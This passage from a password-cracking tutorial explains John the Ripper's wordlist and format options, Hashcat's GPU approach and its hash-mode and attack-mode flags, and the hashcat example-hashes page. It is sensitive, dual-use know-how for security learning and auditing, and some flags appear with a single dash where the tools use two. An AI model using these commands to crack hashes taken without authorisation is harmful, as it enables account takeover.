• -wordlist=<path_to_wordlist>: This option tells John where to find the wordlist you want to use. A very common and powerful wordlist is /usr/share/wordlists/rockyou.txt. However, on some Kali Linux installations, this file is compressed. You may need to unzip it first with the command: sudo gunzip /usr/share/wordlists/rockyou.txt.gz. After that, you can point to it: -wordlist=/usr/share/wordlists/rockyou.txt.

• <hash_file>: This is the path to the file that contains the password hashes you want to crack. The hashes need to be in a format that John understands. For example, if you have a file with a single MD5 hash, you would just put that hash string in a text file.

Optional Arguments:

• -format=<HASH_TYPE>: This is a very important option for speed and accuracy. If you know what type of hash you're dealing with (e.g., MD5, SHA1, bcrypt, NTLM), you can tell John explicitly. If you don't specify it, John will try to auto-detect the hash type, which can be slower and sometimes error-prone.
  • Example: john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt

  • This command tells John: "Use the rockyou.txt wordlist, and the hashes in the file hashes.txt are of type 'raw-md5'."

• john --list=formats: This command is incredibly useful. It will print a massive list of every hash format that John supports. You can scroll through this list to find the exact name you need for the -format option. For example, you'll see raw-md5, nt, sha512crypt, and hundreds more.

Password Cracking - Hashcat

Hashcat is a high-performance password cracking tool. While John uses the computer's CPU (Central Processing Unit) to do its work, Hashcat is designed to use the computer's GPU (Graphics Processing Unit).

Why is GPU acceleration so important?

• CPUs are designed for complex, sequential tasks. They have a few powerful cores.

• GPUs are designed for massively parallel tasks. They have thousands of smaller, simpler cores. Think of rendering a 3D image: the task of calculating the color of each pixel can be done in parallel across thousands of cores.

Hashing is a task that can be massively parallelized. If you have to try 10 million passwords, you can split that workload across the thousands of cores in a GPU. This makes Hashcat incredibly fast—often hundreds or even thousands of times faster than a CPU-based tool like John. If you have a good graphics card, Hashcat is the tool of choice for cracking large numbers of hashes quickly.

Usage and Syntax:

Hashcat's syntax is different from John's. It relies on numbers to identify hash types and attack modes.

The basic syntax is: hashcat -m <Hash_type_NO> -a <Attack_mode> <HASH_FILE> <Wordlist_FILE>

Let's break it down:

• m <Hash_type_NO>: This is the -hash-type flag. Instead of using a name like raw-md5, you use a number. You must look up the correct number for the hash you're attacking.
  • Example: m 0 is for MD5.

  • Example: m 1000 is for NTLM (Windows passwords).

  • Example: m 3200 is for bcrypt.

• a <Attack_mode>: This is the -attack-mode flag.
  • a 0 is for a straight dictionary/wordlist attack. This is the most common.

  • a 3 is for a brute-force mask attack, where you define a pattern of characters (e.g., all 8-digit numbers).

• <HASH_FILE>: The path to the file containing the hash(es) you want to crack. The format of this file can be very specific, which is why the next resource is so important.

• <Wordlist_FILE>: The path to your wordlist, like rockyou.txt.

The Essential Resource:

Visit the link: https://hashcat.net/wiki/doku.php?id=example_hashes

This page is your Hashcat bible. It lists hundreds of hash types, and for each one, it shows:

• The Hash Name (e.g., MD5, NTLM, bcrypt).

• The m number you need to use.

• An Example Hash in the exact format that Hashcat expects.

If you have a hash and you're not sure how to format it for Hashcat, this page is where you go. You find your hash type, and you make sure your hash in your file looks exactly like the example.